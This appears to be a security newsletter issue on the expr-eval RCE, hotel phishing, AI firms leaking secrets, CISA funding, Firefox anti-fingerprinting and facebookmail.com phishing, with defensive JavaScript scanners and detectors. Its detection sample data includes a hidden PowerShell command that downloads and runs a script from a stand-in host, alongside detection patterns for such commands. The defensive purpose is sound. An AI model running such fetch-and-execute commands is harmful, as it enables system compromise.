The Pulse of Cloud and Cyber — Issue 2: Special Edition on Practical Security
From a compromised JavaScript library to the hidden war over your data
A critical RCE vulnerability in the popular JavaScript library expr-eval can be chained to compromise web applications and even AI systems; a sophisticated phishing campaign is targeting hotels and their guests with the ClickFix malware; a new report from Wiz shows that 65% of leading AI start-ups are leaking their own tokens and keys on GitHub; in Washington, a stopgap spending bill keeps vital funding for the CISA Act and FCEA in place through January 2026; Firefox 145 and its new anti-fingerprinting defenses have almost cut user tracking in half; and finally, a clever abuse of Meta Business Suite is bombarding businesses with phishing emails sent from the official facebookmail.com domain. This report aims to turn these headlines into concrete, day-to-day decisions for engineering, security, and product teams.
Behnam Khushab
Published on November 11, 2025 · Updated November 11, 2025

Critical RCE Vulnerability in expr-eval Library: When JavaScript Calculators Execute Arbitrary Code
Recent disclosures from the GitHub Advisory Database and CERT/CC have revealed a significant security flaw in the widely used expr-eval library and its forks, tracked as CVE-2025-12735. The vulnerability stems from insufficient input validation in the evaluate() function, which fails to properly sanitize object inputs. This oversight allows attackers to inject malicious objects as variables, potentially leading to arbitrary code execution in specific scenarios.
The library's widespread adoption across diverse projects—ranging from simple web applications to sophisticated NLP and AI services—amplifies the potential impact of this vulnerability. At the time of writing, the CVE has been classified as high severity, with software supply chain monitoring revealing multiple versions of the library actively deployed throughout the npm ecosystem. Particularly concerning is the transitive dependency pattern, where numerous projects unknowingly incorporate the vulnerable library through their dependencies.
Why This Matters
For organizations utilizing expr-eval in server-side environments or systems with operating system access to evaluate user-supplied expressions, this vulnerability represents a critical escalation path from a seemingly benign logic issue to complete server compromise. Node.js and frontend teams relying on this library—whether directly or through transitive dependencies—should take immediate action:
- Conduct comprehensive dependency scans for expr-eval and expr-eval-fork
- Review all instances where evaluate() processes untrusted input
- Implement strict input validation and isolation measures (sandboxing, context restriction, avoiding execution on primary servers)
- Upgrade to patched versions immediately upon release
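The first two action items above (find every copy of the library, then stop untrusted object values from reaching evaluate()) can both be automated. The following is an added example written for this newsletter; it is not code from the expr-eval project or from the advisory. It assumes a lockfile in npm's v1 or v2/v3 layout, uses a constructed sample lockfile with made-up version numbers, and stands in for the library call with a plain function argument so the guard can be shown without the dependency installed.

```javascript
// Added example (not from expr-eval or the advisory). Two defensive checks:
//  (1) findVulnerableDeps(): list every installed copy of expr-eval or
//      expr-eval-fork in a package-lock.json, nested transitive copies included.
//  (2) sanitizeVariables(): let only primitive values into the variable map
//      handed to an expression evaluator, so object-typed inputs never reach it.

const WATCHED_PACKAGES = new Set(["expr-eval", "expr-eval-fork"]);

// Lockfile v2/v3 keeps a flat `packages` map keyed by install path;
// lockfile v1 nests `dependencies`. Both shapes are handled.
function findVulnerableDeps(lockfile, watched = WATCHED_PACKAGES) {
  const hits = [];
  const marker = "node_modules/";
  if (lockfile.packages) {
    for (const [installPath, meta] of Object.entries(lockfile.packages)) {
      if (installPath === "") continue; // "" is the root project itself
      const name = installPath.slice(installPath.lastIndexOf(marker) + marker.length);
      if (watched.has(name)) hits.push({ name, version: meta.version, path: installPath });
    }
  } else if (lockfile.dependencies) {
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps)) {
        const installPath = `${prefix}${marker}${name}`;
        if (watched.has(name)) hits.push({ name, version: meta.version, path: installPath });
        if (meta.dependencies) walk(meta.dependencies, `${installPath}/`);
      }
    };
    walk(lockfile.dependencies, "");
  }
  return hits;
}

const PRIMITIVE_TYPES = new Set(["number", "boolean", "string"]);
const IDENT = /^[A-Za-z_][A-Za-z0-9_]*$/;

// Returns a prototype-less copy of `vars` holding only finite numbers, booleans
// and strings. Objects, arrays, functions, symbols, bigints, null and undefined
// are rejected instead of being forwarded to the evaluator.
function sanitizeVariables(vars) {
  if (vars === null || typeof vars !== "object" || Array.isArray(vars)) {
    throw new TypeError("variables must be a plain object");
  }
  const clean = Object.create(null);
  for (const [key, value] of Object.entries(vars)) {
    if (!IDENT.test(key) || key === "__proto__" || key === "constructor") {
      throw new TypeError(`rejected variable name: ${key}`);
    }
    const type = typeof value;
    if (!PRIMITIVE_TYPES.has(type)) {
      throw new TypeError(`variable ${key} has type ${type}; only primitives are allowed`);
    }
    if (type === "number" && !Number.isFinite(value)) {
      throw new TypeError(`variable ${key} is not a finite number`);
    }
    clean[key] = value;
  }
  return clean;
}

// `evaluator` stands in for the library call (for instance a parsed expression's
// evaluate method); the guard runs first, so the library only ever sees primitives.
function evaluateGuarded(evaluator, expression, vars) {
  return evaluator(expression, sanitizeVariables(vars));
}

// Constructed sample lockfile; version numbers are illustrative, not advisory data.
const SAMPLE_LOCKFILE = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/formula-widget": { version: "4.2.0" },
    "node_modules/expr-eval": { version: "1.2.3" },
    "node_modules/legacy-report": { version: "0.9.0" },
    "node_modules/legacy-report/node_modules/expr-eval-fork": { version: "0.4.5" },
  },
};

for (const hit of findVulnerableDeps(SAMPLE_LOCKFILE)) {
  console.log(`found ${hit.name}@${hit.version} at ${hit.path}`);
}
```

Run the scanner against the real lockfile of each service (including ones that only pull the library in transitively), and wire sanitizeVariables() in front of every call site that evaluates expressions built from request data.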
Double-Charged: Sophisticated Phishing Campaign Targets Hotels and Their Guests
A comprehensive investigation by Sekoia.io has uncovered a multi-layered attack campaign targeting hotel management systems. The operation employs a sophisticated chain of techniques, from initial phishing emails through ClickFix malware deployment, culminating in PureRAT installation for persistent system control.
The attack methodology follows a carefully orchestrated sequence. Initially, attackers compromise hotel manager systems through phishing, gaining access to Booking.com accounts or similar platforms such as Expedia. Leveraging legitimate extranet credentials, they then initiate duplicate charges for existing reservations, creating the illusion of official communication from the hotel or booking platform. In several documented cases, attackers deployed convincing payment pages mimicking Booking.com's interface, hosted behind Cloudflare infrastructure, to harvest guests' banking credentials.
Supporting this operation is an extensive underground ecosystem operating within Russian-language forums, where threat actors trade hotel manager email databases, authentication cookies, credentials, and infostealer logs.
Implications for the Hospitality Industry
Organizations in hospitality, tourism, and businesses dependent on booking platforms must recognize that official channels cannot be presumed secure. Administrative security—encompassing email systems, workstations, antivirus solutions, and EDR deployment—has become mission-critical. Essential protective measures include:
- Restricting administrative logins to hardened, managed devices
- Enforcing multi-factor authentication across all access points
- Implementing granular access controls for administrative functions
- Establishing alerts for duplicate billing transactions and unusual account modifications
For security operations centers, Sekoia's report provides actionable detection queries and Sigma rules for identifying PowerShell misuse, DLL sideloading, and anomalous AddInProcess32.exe behavior, ready for SIEM integration.
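To make the three detection themes concrete, here is an added example written for this newsletter; it is not Sekoia's detection content and not their Sigma rules. It runs simple versions of those detections over constructed Sysmon-style process-creation and image-load events. The expected install directory of AddInProcess32.exe, the list of script-host parents, the user-writable path patterns and the PowerShell indicator strings are all illustrative assumptions to tune for your environment.

```javascript
// Added example (not Sekoia's rules). Three detections over constructed
// Sysmon-style events: PowerShell misuse, DLL sideloading candidates, and
// AddInProcess32.exe started from an unexpected path or parent.

const basename = (p) => p.split(/[\\\/]/).pop().toLowerCase();
const dirname = (p) => p.slice(0, Math.max(p.lastIndexOf("\\"), p.lastIndexOf("/"))).toLowerCase();

// Locations an ordinary user can write to (assumption): a signed binary loading
// an unsigned DLL from its own directory in one of these is a sideloading setup.
const USER_WRITABLE = [/\\users\\[^\\]+\\appdata\\/, /\\users\\[^\\]+\\downloads\\/,
  /\\programdata\\/, /\\temp\\/, /\\users\\public\\/];
const isUserWritable = (p) => USER_WRITABLE.some((re) => re.test(p.toLowerCase()));

// Script hosts that should not normally parent AddInProcess32.exe (assumption).
const SCRIPT_HOSTS = new Set(["powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"]);
// Directory AddInProcess32.exe ships in with the .NET Framework (assumption).
const DOTNET_DIR = /\\microsoft\.net\\framework(64)?\\v[\d.]+$/;

// An encoded command alone is enough to alert; otherwise two weaker indicators are required.
const PS_ENCODED = /-e(nc(odedcommand)?)?\s+[A-Za-z0-9+\/=]{40,}/i;
const PS_WEAK = [/-w(indowstyle)?\s+hidden/i, /\b(iex|invoke-expression)\b/i,
  /\b(downloadstring|downloadfile|invoke-webrequest|frombase64string)\b/i, /-nop(rofile)?\b/i];

function detect(event) {
  const alerts = [];
  const image = basename(event.Image);
  if (event.EventType === "ProcessCreate") {
    const parent = basename(event.ParentImage);
    const cmd = event.CommandLine || "";
    if (image === "powershell.exe" || image === "pwsh.exe") {
      const weak = PS_WEAK.filter((re) => re.test(cmd)).length;
      if (PS_ENCODED.test(cmd) || weak >= 2) alerts.push({ rule: "powershell_misuse", image: event.Image });
    }
    if (image === "addinprocess32.exe") {
      if (!DOTNET_DIR.test(dirname(event.Image))) {
        alerts.push({ rule: "addinprocess32_unexpected_path", image: event.Image });
      }
      if (SCRIPT_HOSTS.has(parent) || isUserWritable(event.ParentImage)) {
        alerts.push({ rule: "addinprocess32_suspicious_parent", image: event.Image, parent: event.ParentImage });
      }
    }
  } else if (event.EventType === "ImageLoad") {
    const dll = event.ImageLoaded;
    const sameDir = dirname(dll) === dirname(event.Image);
    if (dll.toLowerCase().endsWith(".dll") && event.ImageSigned && !event.LoadedSigned && sameDir && isUserWritable(dll)) {
      alerts.push({ rule: "dll_sideloading_candidate", image: event.Image, loaded: dll });
    }
  }
  return alerts;
}

function runDetections(events) {
  return events.flatMap(detect);
}

// Constructed sample events; paths, parents and command lines are made up.
const PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
const SAMPLE_EVENTS = [
  { EventType: "ProcessCreate", Image: PS, ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: "powershell.exe -NoProfile -Command Get-Date" },
  { EventType: "ProcessCreate", Image: PS, ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')\"" },
  { EventType: "ProcessCreate", Image: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe",
    ParentImage: "C:\\Users\\alice\\AppData\\Local\\Temp\\updater.exe", CommandLine: "AddInProcess32.exe" },
  { EventType: "ProcessCreate", Image: "C:\\Users\\alice\\AppData\\Roaming\\AddInProcess32.exe",
    ParentImage: PS, CommandLine: "AddInProcess32.exe" },
  { EventType: "ImageLoad", Image: "C:\\Users\\alice\\Downloads\\invoice-viewer\\viewer.exe", ImageSigned: true,
    ImageLoaded: "C:\\Users\\alice\\Downloads\\invoice-viewer\\version.dll", LoadedSigned: false },
  { EventType: "ImageLoad", Image: "C:\\Program Files\\Demo\\demo.exe", ImageSigned: true,
    ImageLoaded: "C:\\Windows\\System32\\version.dll", LoadedSigned: true },
];

for (const alert of runDetections(SAMPLE_EVENTS)) console.log(alert);
```

The benign PowerShell invocation and the benign DLL load produce nothing; the other four events produce five alerts between them. The same conditions map directly onto Sigma selections (Image, ParentImage, CommandLine, ImageLoaded and signature fields), which is the form a SIEM team would normally deploy them in.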
AI Companies Exposing Themselves on GitHub
Cloud security firm Wiz conducted an extensive analysis of the Forbes AI 50 list, examining the top 50 private artificial intelligence companies. Their findings reveal that 65% of these organizations have experienced at least one confirmed secrets exposure on GitHub, ranging from API tokens and keys to sensitive credentials.
The research methodology extended beyond superficial repository scanning to encompass complete commit histories, deleted forks, gists, and public repositories belonging to organization members. Significantly, a substantial portion of exposed secrets was discovered in the periphery of the GitHub ecosystem rather than within primary organizational repositories.
Security Beyond Models and Datasets
For AI and machine learning teams, security considerations must extend beyond model protection and dataset integrity. GPU access tokens, proprietary datasets, and cloud infrastructure credentials have become primary targets. Essential security measures include:
- Expanding secret scanning beyond primary organizations to include personal accounts, gists, and forks
- Implementing robust token rotation policies and strict controls on GitHub Personal Access Tokens and cloud keys
- Utilizing formal secrets management solutions rather than committing .env files to repositories, particularly for sensitive model-related projects
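The first item, expanding scanning to gists, forks and personal accounts, only helps if the scanner itself is reasonable. Below is an added example written for this newsletter, not Wiz's tooling, of a scanner that runs over any text you can pull (file contents, commit diffs, gist bodies) and reports candidate secrets by known token prefixes and by high-entropy values assigned to secret-looking names. The token prefixes are public formats, but the length constraints, the name keywords and the entropy threshold are assumptions to tune; the sample .env content is constructed and uses only fake values (the AKIA key is AWS's documented example key).

```javascript
// Added example (not Wiz's tooling). Scans text for candidate secrets and
// reports masked findings, never the full value.

// Prefixes are public token formats; length bounds are approximations (assumption).
const KNOWN_PATTERNS = [
  { kind: "github_pat_classic", re: /\bghp_[A-Za-z0-9]{36}\b/g },
  { kind: "github_pat_fine_grained", re: /\bgithub_pat_[A-Za-z0-9_]{22,}\b/g },
  { kind: "aws_access_key_id", re: /\bAKIA[0-9A-Z]{16}\b/g },
  { kind: "huggingface_token", re: /\bhf_[A-Za-z0-9]{30,}\b/g },
];

// KEY=value / key: "value" lines, with an optional leading +/- so diff hunks scan too.
const ASSIGNMENT = /^[+-]?\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*[=:]\s*["']?([A-Za-z0-9+\/=_\-]{20,})["']?\s*,?$/;
const SECRET_NAME = /(secret|token|passw|pwd|api[_-]?key|access[_-]?key|private[_-]?key|credential)/i;
const PLACEHOLDER = /example|changeme|placeholder|xxxx|your[_-]?/i;
const ENTROPY_THRESHOLD = 3.5; // bits per character (assumption)

// Shannon entropy in bits per character.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Keep a short prefix for triage; the rest is never written to the findings log.
const mask = (value) => value.slice(0, 4) + "*".repeat(Math.max(0, value.length - 4));

function scanText(text, source = "<input>") {
  const findings = [];
  text.split(/\r?\n/).forEach((line, idx) => {
    const lineNo = idx + 1;
    let knownHit = false;
    for (const { kind, re } of KNOWN_PATTERNS) {
      for (const m of line.matchAll(re)) {
        findings.push({ source, line: lineNo, kind, masked: mask(m[0]) });
        knownHit = true;
      }
    }
    if (knownHit) return; // do not double-report the same line via the entropy rule
    const m = ASSIGNMENT.exec(line);
    if (!m) return;
    const [, name, value] = m;
    if (!SECRET_NAME.test(name) || PLACEHOLDER.test(value)) return;
    const entropy = shannonEntropy(value);
    if (entropy >= ENTROPY_THRESHOLD) {
      findings.push({ source, line: lineNo, kind: "high_entropy_assignment", masked: mask(value), entropy: +entropy.toFixed(2) });
    }
  });
  return findings;
}

// Constructed sample .env; every value is fake.
const SAMPLE_ENV = [
  "# constructed sample .env; every value below is fake",
  "APP_ENV=production",
  "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
  "GITHUB_TOKEN=ghp_0123456789abcdefghijABCDEFGHIJklmnop",
  "DB_PASSWORD=\"q7Rv2xLp9sTmZc4Wn8Kd1YbH\"",
  "MODEL_BUCKET_URL=https://storage.example.invalid/models",
  "API_KEY=changeme-changeme-changeme",
].join("\n");

for (const f of scanText(SAMPLE_ENV, "constructed/.env")) console.log(f);
```

The placeholder filter is deliberately conservative: it drops obvious dummy values so the entropy rule does not drown reviewers in noise, while anything matching a known prefix is always reported. Point the same function at `git log -p` output and at gist bodies fetched for each organization member to cover the periphery Wiz found most secrets in.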
Government Shutdown Continues, But Cybersecurity Cannot: Temporary Extension of CISA Act and FCEA Funding
Amid the longest federal government shutdown in United States history, H.R.5371 (Continuing Appropriations and Extensions Act, 2026) has been introduced to Congress to temporarily restore critical funding. This legislation extends financial support for the Cybersecurity Information Sharing Act (CISA Act) and Federal Cybersecurity Enhancement Act (FCEA) through January 2026.
The CISA Act establishes the framework for threat intelligence sharing between private sector entities and government agencies, while FCEA defines security standards and mechanisms for federal critical infrastructure. Without this extension, the formal apparatus for receiving and distributing threat intelligence at the national level would effectively cease operations.
However, this represents merely a stopgap measure. Should long-term agreement fail to materialize by year-end 2025, the risk of renewed budgetary gaps in early 2026 remains substantial.
Implications for Threat Intelligence Consumers
Organizations relying on U.S. government threat feeds or CISA-based frameworks should note that while short-term threat intelligence sharing mechanisms remain operational, contingency planning for potential non-renewal scenarios is prudent. This necessitates increased reliance on commercial and open-source threat intelligence, along with strengthened regional and industry-specific collaborative arrangements.
Firefox 145 and the War on Fingerprinting: Dramatic Reduction in User Tracking
Mozilla has announced that Firefox 145 introduces a new generation of anti-fingerprinting defenses, which, according to real-world data, approximately halve the proportion of users who can be uniquely fingerprinted. These protections are currently active in Private Browsing mode and Enhanced Tracking Protection – Strict mode.
The implemented measures include restricting hardware information disclosure (CPU core counts, touch capabilities, dock/taskbar dimensions), standardizing available fonts (excluding essential language fonts), and introducing randomized noise to certain graphics and image readings to neutralize canvas-based fingerprinting techniques.
Mozilla emphasizes their approach balances usability with privacy. Certain information, such as timezone data essential for calendar and conferencing services, remains accessible to prevent web functionality degradation.
Implications for Users and Web Developers
For privacy-conscious users, Firefox with Enhanced Tracking Protection in Strict mode now represents one of the market's most robust options. Web development teams should recognize that increasingly aggressive fingerprinting techniques correlate with higher probability of degraded user experiences on browsers like Firefox. Dependencies on fingerprinting for user identification—such as anti-fraud measures—warrant review and migration toward less invasive methodologies.
Phishing via Official facebookmail.com Domain: Meta Business Suite Exploitation
Research by Check Point's Harmony Email Security team has documented an extensive phishing campaign exploiting Meta Business Suite and the legitimate facebookmail.com domain. The attack methodology involves creating fraudulent Facebook Business pages with logos and names mimicking legitimate brands, then leveraging Business Suite's collaboration invitation and advertising program features to dispatch emails resembling authentic Facebook notifications—genuinely originating from the facebookmail.com domain.
Common themes include invitations to free advertising credit programs, official Meta partner programs, and account verification requirements. Embedded links redirect to phishing pages (frequently hosted on domains such as vercel.app) designed to harvest account credentials.
According to Check Point telemetry, over 40,000 phishing emails have been delivered to approximately 5,000 organizations, with one company receiving more than 4,200 such messages. Targets predominantly comprise small and medium businesses in sectors including online advertising, automotive, education, and real estate.
Beyond Domain Verification
This campaign demonstrates that traditional security training focused solely on sender domain verification proves insufficient when legitimate domains become components of the attack chain. Marketing and social media teams should implement mandatory multi-factor authentication across all Meta, Facebook, and Instagram accounts, establish protocols for reporting suspicious emails through internal security channels regardless of apparent sender legitimacy, and restrict Business Suite access to managed devices with MDM/EDR protection.
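Because the sender domain is genuine here, mail triage has to look at what the message asks for and where its links lead. The following is an added example written for this newsletter, not Check Point's detection logic: a scorer that ignores sender reputation and instead flags Meta-branded mail whose links leave Meta-owned domains, with extra weight for free-hosting suffixes and for the lure themes the campaign used. The Meta-owned domain list, the free-hosting list beyond vercel.app, the lure patterns and the weights are assumptions; the three messages are constructed.

```javascript
// Added example (not Check Point's logic). Scores a notification by its links
// and its ask rather than by the sender domain.

const META_OWNED = ["facebook.com", "facebookmail.com", "meta.com", "instagram.com", "fb.com"]; // assumption
// vercel.app is the host family named in the campaign report; the rest are assumptions.
const FREE_HOSTING = ["vercel.app", "netlify.app", "pages.dev"];
// Lure themes reported in the campaign, as loose patterns (assumption).
const LURES = [
  { theme: "ad_credit", re: /\b(free )?(ad|advertising) credits?\b/i },
  { theme: "partner_program", re: /\bpartner program\b/i },
  { theme: "verification", re: /\b(verify your (account|page|business)|verification required)\b/i },
  { theme: "urgency", re: /\b(within \d+ hours|immediately|will be (restricted|disabled|suspended))\b/i },
];

const hostMatches = (host, list) => list.some((d) => host === d || host.endsWith("." + d));
const senderDomainOf = (from) => ((from.match(/@([A-Za-z0-9.-]+)/) || [])[1] || "").toLowerCase();

// Hostnames of every http(s) URL in the text; unparsable URLs are skipped.
function extractHosts(text) {
  const hosts = [];
  for (const m of text.matchAll(/https?:\/\/[^\s<>"')\]]+/g)) {
    try { hosts.push(new URL(m[0]).hostname.toLowerCase()); } catch { /* ignore */ }
  }
  return hosts;
}

function triage(msg) {
  const senderDomain = senderDomainOf(msg.from);
  const senderIsMetaOwned = hostMatches(senderDomain, META_OWNED);
  const text = `${msg.subject}\n${msg.body}`;
  // The off-platform rule applies to mail that is, or claims to be, from Meta.
  const claimsMeta = senderIsMetaOwned || /\b(meta|facebook|instagram)\b/i.test(text);
  let score = 0;
  const offPlatformLinks = [];
  for (const host of extractHosts(text)) {
    if (hostMatches(host, META_OWNED)) continue;
    offPlatformLinks.push(host);
    if (claimsMeta) score += 3;                      // Meta-branded mail linking elsewhere
    if (hostMatches(host, FREE_HOSTING)) score += 2; // credential pages on free hosting
  }
  const themes = LURES.filter(({ re }) => re.test(text)).map(({ theme }) => theme);
  score += themes.length;
  const verdict = score >= 5 ? "hold_for_review" : score >= 2 ? "warn_user" : "deliver";
  return { senderDomain, senderIsMetaOwned, offPlatformLinks, themes, score, verdict };
}

// Constructed sample messages; addresses, names and URLs are made up.
const SAMPLE_MESSAGES = [
  { from: "Facebook <notification@facebookmail.com>", subject: "Alice commented on your post",
    body: "Alice commented on your post. See it here: https://www.facebook.com/n/?id=123" },
  { from: "Meta for Business <notification@facebookmail.com>", subject: "You've been invited to the Meta Partner Program",
    body: "Your page qualifies for the Meta Partner Program and a free $500 advertising credit. " +
      "Verify your account within 24 hours to keep access: https://meta-partner-verify.vercel.app/login" },
  { from: "Weekly Digest <news@example.invalid>", subject: "This week's posts",
    body: "New on the blog: https://example.invalid/blog" },
];

for (const msg of SAMPLE_MESSAGES) console.log(msg.subject, "->", triage(msg));
```

The second message scores 9 and is held even though its sender domain is the real facebookmail.com; the first, a plain notification linking back to facebook.com, is delivered. Run this as a post-delivery rule on mail from Meta-owned domains so that marketing teams see a warning banner or a quarantine instead of relying on the sender line.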
Editorial Summary
The JavaScript supply chain continues to present significant risk vectors. A seemingly minor library like expr-eval can transform into a backdoor for code execution on production servers, particularly within AI and NLP environments. Dependency hygiene has evolved from a luxury to a fundamental security requirement.
Phishing has matured into an organized business model. From hotels to booking platforms, the "double-charge" methodology and black market for Booking.com logs demonstrate how attackers focus on specific vertical ecosystems, offering every component as-a-service.
The AI sector's GitHub exposure reveals systemic challenges. If 65% of Forbes AI 50 companies have leaked secrets on GitHub, organizations lacking rigorous secrets management and Git hygiene policies likely face identical risks.
Even amid government shutdowns, Congress recognizes the strategic imperative of maintaining CISA Act and FCEA funding through temporary measures, underscoring that threat intelligence sharing infrastructure cannot be casually suspended.
Finally, the contrast between Firefox's advanced anti-fingerprinting capabilities and the exploitation of facebookmail.com illustrates the dual nature of the current landscape: users caught between browsers fighting for their privacy and platforms inadvertently becoming attack vectors.